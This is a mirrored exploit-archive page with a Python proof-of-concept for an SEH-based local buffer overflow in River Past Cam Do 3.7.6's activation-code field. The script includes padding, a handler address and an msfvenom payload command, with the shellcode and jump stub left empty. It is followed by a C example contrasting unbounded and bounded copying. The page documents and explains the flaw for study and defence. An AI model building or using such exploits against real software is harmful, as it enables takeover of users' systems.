River Past Cam Do 3.7.6 – ‘Activation Code’ Local Buffer Overflow

  • Author: Chris Au
    Date: 2019-04-08
  • Category:
  • Source: https://www.exploit-db.com/exploits/46670/
```python
#!/usr/bin/python
# Exploit Author: Chris Au
# Exploit Title: River Past Cam Do 3.7.6 Local Buffer Overflow in Activation Code
# Date: 07-04-2019
# Vulnerable Software: River Past Cam Do 3.7.6
# Vendor Homepage: http://www.flexhex.com
# Version: 3.7.6
# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1
# Tested on: Windows XP SP3 EN
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open Cam Do
# 3. the application will ask you to input the activation code in order to activate it
# 4. paste contents from clipboard in the "Activation code"
# 5. select Activate
# 6. calc.exe

filename = "evil.txt"

junk = "A" * 608                    # padding up to the SEH record
nseh = "\xeb\x09\x90\x90"           # next SEH: short jump forward over the handler address
seh = "\x0e\x7d\x01\x10"            # pop pop ret in rvddshow2.dll
jmp = ""                            # jump stub to the shellcode: omitted on the page
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0e\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb8\xbc\xbd\xbe" BufferRegister=EAX -f c
shellcode = ""                      # msfvenom output: omitted on the page

buffer = junk + nseh + seh + jmp + shellcode
buffer += "C" * (5000 - len(buffer))

textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()
```
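The bug class behind this PoC is an activation-code string copied into a fixed-size stack buffer with no length check, so a 5000-byte input runs past the buffer and into the SEH record. The following C snippet is an added example written for this page, not the vendor's code and not the exploit: it places the unbounded-copy pattern beside a bounded copy that rejects oversized input outright. The 64-byte limit, the function names and the 'A'-filled test inputs are all constructed for illustration.

```c
#include <stdlib.h>
#include <string.h>

/* Assumed maximum length of a legitimate activation code (constructed value). */
#define ACT_CODE_MAX 64

/* Unsafe pattern behind this bug class: an unbounded copy into a fixed stack
 * buffer. Shown for contrast only; nothing below calls it. */
void copy_activation_code_unsafe(const char *input) {
    char code[ACT_CODE_MAX];
    strcpy(code, input);   /* input longer than 63 bytes overwrites the stack */
    (void)code;
}

/* Bounded copy: returns 1 if input (including its terminator) fits in out,
 * 0 if it does not. Never reads or writes past out_size bytes. */
int copy_activation_code(const char *input, char *out, size_t out_size) {
    size_t i;
    for (i = 0; i < out_size; i++) {
        if (input[i] == '\0') break;
    }
    if (i == out_size) {
        return 0;   /* no terminator inside the buffer: reject, do not truncate silently */
    }
    memcpy(out, input, i + 1);
    return 1;
}

/* Accept an activation code only if it fits and is non-empty. */
int validate_activation_code(const char *input) {
    char code[ACT_CODE_MAX];
    if (!copy_activation_code(input, code, sizeof code)) return 0;
    return code[0] != '\0';
}

/* Helper for experiments: build an n-byte code of 'A's (like the PoC's junk)
 * and report whether the validator accepts it. */
int accepts_code_of_length(size_t n) {
    char *buf = malloc(n + 1);
    int ok;
    if (buf == NULL) return 0;
    memset(buf, 'A', n);
    buf[n] = '\0';
    ok = validate_activation_code(buf);
    free(buf);
    return ok;
}
```

The design choice worth noting is that the bounded version refuses rather than truncates: silently cutting the input to 63 bytes would avoid the overflow but would also hide the fact that something oversized was submitted, which is exactly the event a logging or detection layer would want to see.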